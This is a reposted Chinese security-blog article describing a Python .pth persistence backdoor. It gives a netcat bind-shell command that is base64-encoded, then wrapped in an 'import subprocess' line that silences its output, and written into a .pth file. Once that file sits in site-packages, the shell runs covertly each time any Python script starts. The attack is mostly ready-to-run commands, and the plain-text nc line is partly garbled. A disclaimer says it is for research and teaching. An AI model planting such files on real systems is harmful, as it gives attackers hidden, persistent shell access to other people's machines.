python .pth 权限维持后门

admin 2025年3月25日13:13:53评论0 views字数 1271阅读4分14秒阅读模式
    看了 securitainment师傅的《Python .pth 文件作为后门持久化机制的分析》[1],摘录一些关键内容并总结了一下核心,

从 Python 3.5 开始,在.pth 文件中以"import"开头 (后跟空格或制表符) 的行会被执行。这使得此类文件中的恶意代码能够在设备上任何代码导入模块时运行。

https://mp.weixin.qq.com/s/paEcOaDw4qlPkxA64fJY0g
如何利用
    这里我采用的是 base64 编码将 nc 反弹 shell 的命令进行混淆,
echo 'rm -/tmp/f; mkfifo /tmp/f; cat /tmp/| /bin/sh -2>&1 | nc -lvvp 45555 > /tmp/f' | base64 -w0

上面的 45555 是受害者主机需要开启的服务端口,通过上面的命令我们可以获取到一段经过 base64 编码的 nc 反弹 shell 命令的内容。

python .pth 权限维持后门
echo 'import subprocess;subprocess.Popen("echo "cm0gLWYgL3RtcC9mOyBta2ZpZm8gL3RtcC9mOyBjYXQgL3RtcC9mIHwgL2Jpbi9zaCAtaSAyPiYxIHwgbmMgLWx2dnAgNDU1NTUgPiAvdG1wL2YK"|base64 -d |bash", shell=True, start_new_session=True, stdout=open("/dev/null""w"), stderr=open("/dev/null""w"))' > 1.pth

             "cm0gLWYgL3RtcC9mOyBta2ZpZm8gL3RtcC9mOyBjYXQgL3RtcC9mIHwgL2Jpbi9zaCAtaSAyPiYxIHwgbmMgLWx2dnAgNDU1NTUgPiAvdG1wL2YK"是上面获取到的经过 base64 编码的内容,将它嵌入到命令中,通过上面的命令会在 shell 执行的目录下获取到一个 1.pth 文件。

python .pth 权限维持后门

将上面生成的1.pth文件移动到python的包管理文件夹下,然后只要随意执行python脚本,就能够触发相应的命令执行(这里实现的是开放端口用于执行shell)

python .pth 权限维持后门

你也可以通过执行下面的 python 脚本,从而生成一个简单的evil.pth文件,将这个文件移动到python的包管理文件夹下随意执行python脚本即可。(身为懒人的我简单的写了一下利用脚本[2],比较粗糙)

python .pth 权限维持后门

    在上文《site 库》相关描述中也提到了关于“sitecustomize 和 usercustomize 权限维持”,有兴趣的可以去简单的阅读一下,很简单的一些内容。
参考资料:

[1] https://mp.weixin.qq.com/s/paEcOaDw4qlPkxA64fJY0g

[2] https://github.com/thedarknessdied/.pth_study

原文始发于微信公众号(蟹堡安全团队):python .pth 权限维持后门

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月25日13:13:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   python .pth 权限维持后门https://cn-sec.com/archives/3882692.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息